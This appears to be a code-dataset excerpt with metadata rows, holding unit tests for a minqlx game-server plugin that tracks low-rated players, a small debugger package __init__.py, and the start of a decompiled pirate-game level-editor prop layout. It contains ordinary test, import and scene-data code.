        patch(time.sleep, lambda int: None)
        when(self.db).get(any).thenReturn(None)
        self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL)
        verify(player2, times=12).center_print(matches(".*Skill warning.*10.*matches left.*"))
        verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*10.*of 10 application matches.*"))

    def test_callback_ratings_bans_low_elo_players_that_used_up_their_application_games(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 799)})
        when(self.db).get(any).thenReturn("11")
        spy2(minqlx.COMMANDS.handle_input)
        when2(minqlx.COMMANDS.handle_input, any, any, any).thenReturn(None)
        patch(minqlx.PlayerInfo, lambda *args: mock(spec=minqlx.PlayerInfo))
        patch(minqlx.next_frame, lambda func: func)
        when(self.db).delete(any).thenReturn(None)
        self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL)
        verify(minqlx.COMMANDS).handle_input(any, any, any)
        verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id))
        verify(self.db).delete("minqlx:players:{}:minelo:freegames".format(player2.steam_id))

    def test_handle_round_start_increases_application_games_for_untracked_player(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 799)})
        when(self.db).get(any).thenReturn("3")
        when(self.db).delete(any).thenReturn(None)
        when(self.db).exists(any).thenReturn(False)
        when(self.db).incr(any).thenReturn(None)
        self.plugin.handle_round_start(1)
        verify(self.db).incr("minqlx:players:{}:minelo:freegames".format(player2.steam_id))

    def test_handle_round_start_makes_exception_for_player_in_exception_list(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        player3 = fake_player(789, "Fake Player3", team="red")
        connected_players(player1, player2, player3)
        self.setup_balance_ratings({(player1, 900), (player2, 799), (player3, 600)})
        self.setup_exception_list([player3])
        when(self.db).get(any).thenReturn("3")
        when(self.db).delete(any).thenReturn(None)
        when(self.db).exists(any).thenReturn(False)
        when(self.db).incr(any).thenReturn(None)
        self.plugin.handle_round_start(1)
        verify(self.db).incr("minqlx:players:{}:minelo:freegames".format(player2.steam_id))
        verify(self.db, times=0).incr("minqlx:players:{}:minelo:freegames".format(player3.steam_id))

    def test_handle_round_start_starts_tracking_for_low_elo_player(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 799)})
        when(self.db).get(any).thenReturn("3")
        when(self.db).delete(any).thenReturn(None)
        when(self.db).exists(any).thenReturn(False)
        when(self.db).incr(any).thenReturn(None)
        self.plugin.handle_round_start(1)
        assert_that(self.plugin.tracked_player_sids, has_item(player2.steam_id))

    def test_handle_round_start_resets_above_games_for_low_elo_player(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 799)})
        when(self.db).get(any).thenReturn("3")
        when(self.db).delete(any).thenReturn(None)
        when(self.db).exists(any).thenReturn(True)
        when(self.db).incr(any).thenReturn(None)
        self.plugin.handle_round_start(1)
        verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id))

    def test_handle_round_start_increases_above_games_for_application_games_player(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 801)})
        when(self.db).get(any).thenReturn("3")
        when(self.db).delete(any).thenReturn(None)
        when(self.db).exists(any).thenReturn(True)
        when(self.db).incr(any).thenReturn(None)
        self.plugin.handle_round_start(1)
        verify(self.db).incr("minqlx:players:{}:minelo:abovegames".format(player2.steam_id))

    def test_handle_round_start_increases_above_games_for_application_games_player_with_no_above_games_set(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 801)})
        when(self.db).get(any).thenReturn("1")
        when(self.db).delete(any).thenReturn(None)
        when(self.db).exists(any).thenReturn(True)
        when(self.db).incr(any).thenReturn(None)
        self.plugin.handle_round_start(1)
        verify(self.db).incr("minqlx:players:{}:minelo:abovegames".format(player2.steam_id))

    def test_handle_round_start_starts_tracking_of_above_elo_players_for_application_games_player(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 801)})
        when(self.db).get(any).thenReturn("3")
        when(self.db).delete(any).thenReturn(None)
        when(self.db).exists(any).thenReturn(True)
        when(self.db).incr(any).thenReturn(None)
        self.plugin.handle_round_start(1)
        assert_that(self.plugin.tracked_player_sids, has_item(player2.steam_id))

    def test_handle_round_start_removes_minelo_db_entries_for_above_elo_player(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({(player1, 900), (player2, 801)})
        when(self.db).get(any).thenReturn("11")
        when(self.db).delete(any).thenReturn(None)
        when(self.db).exists(any).thenReturn(True)
        when(self.db).incr(any).thenReturn(None)
        self.plugin.handle_round_start(1)
        verify(self.db).delete("minqlx:players:{}:minelo:freegames".format(player2.steam_id))
        verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id))

    def test_handle_round_start_skips_already_tracked_player(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.plugin.tracked_player_sids.append(player2.steam_id)
        self.setup_balance_ratings({(player1, 900), (player2, 799)})
        when(self.db).get(any).thenReturn(3)
        when(self.db).delete(any).thenReturn(None)
        when(self.db).exists(any).thenReturn(False)
        when(self.db).incr(any).thenReturn(None)
        self.plugin.handle_round_start(1)
        # an already tracked player should trigger neither a delete nor an incr
        verify(self.db, times=0).delete(any)
        verify(self.db, times=0).incr(any)

    def test_handle_round_start_with_unsupported_gametype(self):
        setup_game_in_progress("unsupported")
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        self.setup_balance_ratings({})
        self.plugin.handle_round_start(2)
        verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any)

    def test_handle_round_start_with_no_balance_plugin(self):
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        connected_players(player1, player2)
        mocked_logger = mock(spec=logging.Logger)
        spy2(minqlx.get_logger)
        when(minqlx).get_logger(self.plugin).thenReturn(mocked_logger)
        self.setup_no_balance_plugin()
        self.plugin.handle_round_start(5)
        verify(mocked_logger, atleast=1).warning(matches("Balance plugin not found.*"))

    def test_cmd_mercis_shows_currently_connected_merciful_players(self):
        player = fake_player(666, "Cmd using Player")
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        player3 = fake_player(789, "Fake Player3", team="blue")
        connected_players(player, player1, player2, player3)
        self.setup_balance_ratings({(player, 1400), (player1, 801), (player2, 799), (player3, 900)})
        when(self.db).get("minqlx:players:{}:minelo:freegames".format(player1.steam_id)).thenReturn("2")
        when(self.db).get("minqlx:players:{}:minelo:freegames".format(player2.steam_id)).thenReturn("3")
        when(self.db).get("minqlx:players:{}:minelo:abovegames".format(player1.steam_id)).thenReturn("6")
        when(self.db).get("minqlx:players:{}:minelo:freegames".format(player.steam_id)).thenReturn(None)
        when(self.db).get("minqlx:players:{}:minelo:freegames".format(player3.steam_id)).thenReturn(None)
        self.plugin.cmd_mercis(player, ["!mercis"], self.reply_channel)
        assert_channel_was_replied(self.reply_channel, matches("Fake Player1 \(elo: 801\):.*8.*application matches "
                                                               "left,.*6.*matches above.*"))
        assert_channel_was_replied(self.reply_channel, matches("Fake Player2 \(elo: 799\):.*7.*application matches "
                                                               "left"))

    def test_cmd_mercis_replies_to_main_channel_instead_of_team_chat(self):
        self.addCleanup(self.reset_chat_channel, minqlx.CHAT_CHANNEL)
        minqlx.CHAT_CHANNEL = mocked_channel()
        player = fake_player(666, "Cmd using Player")
        player1 = fake_player(123, "Fake Player1", team="red")
        player2 = fake_player(456, "Fake Player2", team="blue")
        player3 = fake_player(789, "Fake Player3", team="blue")
        connected_players(player, player1, player2, player3)
        self.setup_balance_ratings({(player, 1400), (player1, 801), (player2, 799), (player3, 900)})
        when(self.db).get("minqlx:players:{}:minelo:freegames".format(player1.steam_id)).thenReturn("2")
        when(self.db).get("minqlx:players:{}:minelo:freegames".format(player2.steam_id)).thenReturn("3")
        when(self.db).get("minqlx:players:{}:minelo:abovegames".format(player1.steam_id)).thenReturn("6")
        when(self.db).get("minqlx:players:{}:minelo:freegames".format(player.steam_id)).thenReturn(None)
        when(self.db).get("minqlx:players:{}:minelo:freegames".format(player3.steam_id)).thenReturn(None)
        self.plugin.cmd_mercis(player, ["!mercis"], minqlx.BLUE_TEAM_CHAT_CHANNEL)
        assert_channel_was_replied(minqlx.CHAT_CHANNEL, matches("Fake Player1 \(elo: 801\):.*8.*application matches "
                                                                "left,.*6.*matches above.*"))
        assert_channel_was_replied(minqlx.CHAT_CHANNEL, matches("Fake Player2 \(elo: 799\):.*7.*application matches "
                                                                "left"))

    def reset_chat_channel(self, original_chat_channel):
        minqlx.CHAT_CHANNEL = original_chat_channel

    def test_cmd_mercis_shows_no_mercis_if_no_player_using_their_application_matches(self):
        player = fake_player(666, "Cmd using Player")
        connected_players(player)
        self.setup_balance_ratings({(player, 1400)})
        when(self.db).get(any).thenReturn(None)
        self.plugin.cmd_mercis(player, ["!mercis"], minqlx.CHAT_CHANNEL)
        assert_plugin_sent_to_console(any, times=0)
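The stubbing and verification idioms used throughout these tests come from mockito-python. A minimal self-contained sketch, independent of minqlx (the `Greeter` class is invented for illustration):

import unittest
from mockito import mock, when, verify, unstub
from mockito.matchers import any


class Greeter:
    def fetch_name(self, user_id):
        raise NotImplementedError  # real lookup is irrelevant; it gets stubbed


class GreeterTest(unittest.TestCase):
    def tearDown(self):
        unstub()  # undo all stubbing after each test, as tearDown does above

    def test_stub_and_verify(self):
        greeter = mock(Greeter)
        # when(...).thenReturn(...) stubs a call, like the Redis mocks above.
        when(greeter).fetch_name(any).thenReturn("World")
        self.assertEqual(greeter.fetch_name(42), "World")
        # verify(..., times=n) asserts how often the stubbed call happened.
        verify(greeter, times=1).fetch_name(42)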
| 44.932673 | 117 | 0.677493 | 2,846 | 22,691 | 5.151792 | 0.077301 | 0.029055 | 0.037512 | 0.045492 | 0.860456 | 0.825672 | 0.817556 | 0.799413 | 0.768858 | 0.738371 | 0 | 0.040239 | 0.189547 | 22,691 | 504 | 118 | 45.021825 | 0.757042 | 0 | 0 | 0.670213 | 0 | 0 | 0.122075 | 0.043497 | 0 | 0 | 0 | 0 | 0.029255 | 1 | 0.098404 | false | 0 | 0.021277 | 0 | 0.12234 | 0.010638 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
86bbd227d8b7715b6a7438754f63aeb34b54d300
| 169 |
py
|
Python
|
py/debug/__init__.py
|
segrids/arduino_due
|
f375020b81459eae9b325aa3646ff84efc2853e8
|
[
"MIT"
] | 3 |
2021-08-20T16:03:37.000Z
|
2022-03-23T20:23:30.000Z
|
py/debug/__init__.py
|
segrids/testbench
|
f375020b81459eae9b325aa3646ff84efc2853e8
|
[
"MIT"
] | null | null | null |
py/debug/__init__.py
|
segrids/testbench
|
f375020b81459eae9b325aa3646ff84efc2853e8
|
[
"MIT"
] | null | null | null |
from .swd import SWD
from .ahb import AHB
from .debugger import Debugger, HaltError, NotHaltedError

# ELFDebugger relies on optional ELF/DWARF tooling, so it is imported
# best-effort: when the dependency is missing, the rest of the package
# still works, just without source-level debugging support.
try:
    from .dwarf import ELFDebugger
except ImportError:
    pass
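A short sketch of how downstream code might cope with the conditionally exported `ELFDebugger`; only the import pattern mirrors this package, and the constructor signatures are hypothetical:

try:
    from debug import ELFDebugger
    HAVE_ELF_DEBUGGER = True
except ImportError:
    HAVE_ELF_DEBUGGER = False

from debug import Debugger

def make_debugger(elf_path=None):
    # Prefer the DWARF-aware debugger when an ELF file is given and the
    # optional dependency is installed; otherwise fall back to Debugger.
    if elf_path is not None and HAVE_ELF_DEBUGGER:
        return ELFDebugger(elf_path)  # hypothetical signature
    return Debugger()  # hypothetical signature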
| 21.125 | 57 | 0.775148 | 22 | 169 | 5.954545 | 0.590909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177515 | 169 | 7 | 58 | 24.142857 | 0.942446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.142857 | 0.714286 | 0 | 0.714286 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 |
0
| 6 |
86ef419ce9a394c69c1d9d5b8bea2b3d98c02484
| 29,478 |
py
|
Python
|
pirates/leveleditor/worldData/interior_spanish_npc_b.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 3 |
2021-02-25T06:38:13.000Z
|
2022-03-22T07:00:15.000Z
|
pirates/leveleditor/worldData/interior_spanish_npc_b.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | null | null | null |
pirates/leveleditor/worldData/interior_spanish_npc_b.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 1 |
2021-02-25T06:38:17.000Z
|
2021-02-25T06:38:17.000Z
|
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.leveleditor.worldData.interior_spanish_npc_b
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Objects': {'1153420207.67dzlu01': {'Type': 'Building Interior', 'Name': '', 'Instanced': True, 'Objects': {'1165347933.66kmuller': {'Type': 'Log_Stack', 'DisableCollision': True, 'Hpr': VBase3(139.803, 0.0, 0.0), 'Pos': Point3(2.978, 25.796, 0.048), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/Log_stack_a'}}, '1166138034.99kmuller': {'Type': 'Log_Stack', 'DisableCollision': True, 'Hpr': VBase3(179.29, 0.0, 0.0), 'Pos': Point3(9.307, 24.592, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/Log_stack_b'}}, '1166138092.34kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(-90.005, 0.0, 0.0), 'Pos': Point3(18.672, 15.355, 0.009), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/cabinet_spanish_low'}}, '1166138151.37kmuller': {'Type': 'Pots', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(18.938, 13.997, 2.735), 'Scale': VBase3(1.464, 1.464, 1.464), 'Visual': {'Model': 'models/props/pot_A'}}, '1166138161.79kmuller': {'Type': 'Pots', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(18.511, 15.482, 3.364), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/pot_B'}}, '1166138390.93kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Holiday': '', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-0.303, 0.276, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.75, 0.9300000071525574, 1.0, 1.0), 'Model': 'models/props/table_bar_round'}}, '1166138443.79kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(-134.164, 0.0, 0.0), 'Pos': Point3(4.61, -3.84, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chair_bank'}}, '1166138454.85kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(54.358, 0.0, 0.0), 'Pos': Point3(-6.565, 0.327, 0.038), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chair_bar'}}, '1166138510.96kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(162.38, 0.0, 0.0), 'Pos': Point3(-3.36, -6.982, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chair_bank'}}, '1166138524.92kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(80.452, 0.0, 0.0), 'Pos': Point3(5.079, 5.725, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chair_bar'}}, '1166138537.42kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(25.255, 0.0, 0.0), 'Pos': Point3(-1.381, 6.177, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chair_bank'}}, '1166138621.31kmuller': {'Type': 'Jugs_and_Jars', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(0.672, -2.129, 3.008), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/bottle_green'}}, '1166138646.6kmuller': {'Type': 'Jugs_and_Jars', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-0.184, 1.377, 3.061), 'Scale': VBase3(1.429, 1.429, 1.429), 'Visual': {'Model': 'models/props/waterpitcher'}}, '1166138674.59kmuller': {'Type': 'Baskets', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(1.112, 0.235, 2.971), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/basket'}}, '1166138708.48kmuller': {'Type': 'Food', 'DisableCollision': False, 'Holiday': '', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(19.066, 23.998, 3.071), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 
'models/props/sausage'}}, '1166138742.6kmuller': {'Type': 'Food', 'DisableCollision': False, 'Hpr': VBase3(0.0, -4.607, 0.0), 'Pos': Point3(12.569, 24.56, 2.688), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/garlicString'}}, '1166138817.45kmuller': {'Type': 'Bucket', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(17.053, 10.72, 0.006), 'Scale': VBase3(0.665, 0.665, 0.665), 'Visual': {'Model': 'models/props/washtub'}}, '1166138973.9kmuller': {'Type': 'Tools', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(18.741, 7.367, 0.02), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/butter_churn'}}, '1166139009.4kmuller': {'Type': 'Tools', 'DisableCollision': False, 'Hpr': VBase3(-2.549, 12.708, -168.558), 'Pos': Point3(-7.195, -29.635, 4.369), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.5, 0.5, 0.5, 1.0), 'Model': 'models/props/broom'}}, '1166139125.65kmuller': {'Type': 'Furniture - Fancy', 'DisableCollision': True, 'Hpr': VBase3(179.014, 0.0, 0.0), 'Pos': Point3(-16.599, -28.46, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/cabinet_fancy_tall'}}, '1166139259.49kmuller': {'Type': 'Mortar_Pestle', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(19.246, 16.431, 3.391), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/mortar_pestle_stone'}}, '1166139339.62kmuller': {'Type': 'Prop_Groups', 'DisableCollision': True, 'Hpr': VBase3(57.552, 0.0, 0.0), 'Pos': Point3(15.438, -23.688, 0.048), 'Scale': VBase3(0.879, 0.879, 0.879), 'Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0), 'Model': 'models/props/prop_group_G'}}, '1166139450.46kmuller': {'Type': 'Trunks', 'DisableCollision': True, 'Hpr': VBase3(-175.386, 0.0, 0.0), 'Pos': Point3(-11.623, -28.323, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/Trunk_rounded_2'}}, '1166139482.6kmuller': {'Type': 'Trunks', 'DisableCollision': False, 'Hpr': VBase3(-100.398, 0.0, 0.0), 'Pos': Point3(17.54, -12.363, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/Trunk_square'}}, '1166139534.14kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(88.8, 0.0, 0.0), 'Pos': Point3(-19.032, -8.401, 0.172), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/bench_bank'}}, '1166139664.39kmuller': {'Type': 'Bucket', 'DisableCollision': True, 'Hpr': VBase3(-38.995, 0.0, 0.0), 'Pos': Point3(4.278, 24.282, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/bucket_handles'}}, '1166139726.17kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': VBase3(-56.33, 0.0, 0.0), 'Pos': Point3(20.726, 15.931, 4.923), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/candle_holder'}}, '1166139823.07kmuller': {'Type': 'Pan', 'DisableCollision': False, 'Hpr': VBase3(-45.198, -0.006, 0.006), 'Pos': Point3(21.602, 17.485, 4.688), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/pan'}}, '1166139883.79kmuller': {'Type': 'Jugs_and_Jars', 'DisableCollision': False, 'Hpr': VBase3(2.971, 0.0, 0.0), 'Pos': Point3(21.796, 18.912, 4.7), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/largejug_B'}}, '1166140032.53kmuller': {'Type': 'Wall_Hangings', 'DisableCollision': False, 'Hpr': VBase3(0.0, 0.0, 0.0), 'Pos': Point3(-2.651, 29.91, 7.991), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/Map_01'}}, '1166143136.15kmuller': {'Type': 
'Light_Fixtures', 'DisableCollision': False, 'Hpr': VBase3(87.919, 0.0, 0.0), 'Pos': Point3(-19.128, 10.233, 7.623), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/lamp_candle'}}, '1166143173.57kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': VBase3(87.919, 0.0, 0.0), 'Pos': Point3(-19.101, -8.222, 7.695), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/lamp_candle'}}, '1166143204.95kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': VBase3(-90.159, 0.0, 0.0), 'Pos': Point3(18.91, 9.923, 7.471), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/lamp_candle'}}, '1166143219.04kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Holiday': '', 'Hpr': VBase3(-90.159, 0.0, 0.0), 'Pos': Point3(19.055, -9.027, 7.695), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/lamp_candle'}}, '1166143244.09kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-0.798, 10.488, 17.608), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chandelier_jail'}}, '1166143275.89kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-0.592, -10.927, 17.594), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chandelier_jail'}}, '1167972216.85kmuller': {'Type': 'Furniture', 'DisableCollision': True, 'Hpr': VBase3(44.958, 0.0, 0.0), 'Pos': Point3(-16.331, 26.168, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/bookshelf_spanish'}}, '1167972409.16kmuller': {'Type': 'Tools', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-19.259, 21.62, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/butter_churn'}}, '1176423441.61dzlu': {'Type': 'Light - Dynamic', 'Attenuation': '0.005', 'ConeAngle': '97.7273', 'DropOff': '6.8182', 'FlickRate': 0.5, 'Flickering': False, 'Hpr': VBase3(6.993, -61.677, 8.03), 'Intensity': '0.4242', 'LightType': 'SPOT', 'Pos': Point3(2.574, -18.447, 27.908), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.8700000047683716, 1.0, 1.0, 1.0), 'Model': 'models/props/light_tool_bulb'}}, '1176423539.22dzlu': {'Type': 'Light - Dynamic', 'Attenuation': '0.005', 'ConeAngle': '64.3182', 'DropOff': '39.5455', 'FlickRate': 0.5, 'Flickering': False, 'Hpr': VBase3(5.763, -56.906, 6.972), 'Intensity': '0.4848', 'LightType': 'SPOT', 'Pos': Point3(-1.976, 15.649, 24.802), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.8700000047683716, 1.0, 1.0, 1.0), 'Model': 'models/props/light_tool_bulb'}}, '1176423736.28dzlu': {'Type': 'Light - Dynamic', 'Attenuation': '0.005', 'ConeAngle': '60.0000', 'DropOff': '0.0000', 'FlickRate': 0.5, 'Flickering': True, 'Hpr': VBase3(0.0, 1.848, 0.0), 'Intensity': '0.5152', 'LightType': 'POINT', 'Pos': Point3(-0.034, -10.675, 13.873), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.95, 0.78, 0.64, 1.0), 'Model': 'models/props/light_tool_bulb'}}, '1176424160.2dzlu': {'Type': 'Light - Dynamic', 'Attenuation': '0.005', 'ConeAngle': '60.0000', 'DropOff': '0.0000', 'FlickRate': 0.5, 'Flickering': False, 'Hpr': VBase3(0.0, 1.848, 0.0), 'Intensity': '0.6061', 'LightType': 'POINT', 'Pos': Point3(-0.105, 11.422, 13.384), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.95, 0.78, 0.64, 1.0), 'Model': 'models/props/light_tool_bulb'}}, '1185496415.31kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 
'Pos': Point3(4.727, 26.813, -0.119), 'Scale': VBase3(2.057, 1.302, 1.198), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube'}}, '1185496487.15kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(45.263, 0.0, 0.0), 'Pos': Point3(-15.061, 24.578, -0.449), 'Scale': VBase3(1.603, 1.0, 1.891), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1185496538.15kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-15.225, -28.682, -0.316), 'Scale': VBase3(2.053, 0.567, 2.235), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube'}}, '1185496598.36kmuller': {'Type': 'Barrel', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(8.521, -28.523, 0.0), 'Scale': VBase3(0.77, 0.77, 0.77), 'Visual': {'Color': (0.47999998927116394, 0.44999998807907104, 0.4099999964237213, 1.0), 'Model': 'models/props/barrel_grey'}}, '1185496634.87kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(-105.442, 0.0, 0.0), 'Pos': Point3(6.902, -26.349, -0.415), 'Scale': VBase3(0.856, 1.0, 1.451), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1185496663.32kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(-134.387, 0.0, 0.0), 'Pos': Point3(11.183, -19.168, -0.394), 'Scale': VBase3(0.955, 1.0, 1.0), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1185496695.84kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(177.474, 0.0, 0.0), 'Pos': Point3(18.836, -16.153, -1.477), 'Scale': 